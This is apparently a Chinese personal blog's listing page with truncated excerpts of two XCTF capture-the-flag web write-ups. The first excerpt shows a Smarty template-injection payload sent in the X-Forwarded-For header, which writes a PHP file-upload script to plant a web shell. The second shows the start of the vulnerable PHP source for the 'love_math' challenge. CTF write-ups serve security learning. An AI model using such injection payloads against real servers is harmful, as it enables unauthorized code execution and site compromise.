刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

攻防世界 XCTF Web smarty Writeup(bypass_disablefunc,move_uploaded_file,smarty)

根据题目提示猜测是smarty模板注入漏洞测试如下 X-Forwarded-For:{9*9}测试发现system命令不能执行,eval不能执行,file_get_contents不能通外网,所以想上传shell就写了一个上传的php文件X-Forwarded-For:{file_put_contents('./up.php','<?php move_uploaded_file($_FILES["file"]["tm

攻防世界 XCTF Web love_math Writeup

<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){     show_source(__FILE__); }else{     //例子 c=20-1     $content = $_GET['c

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.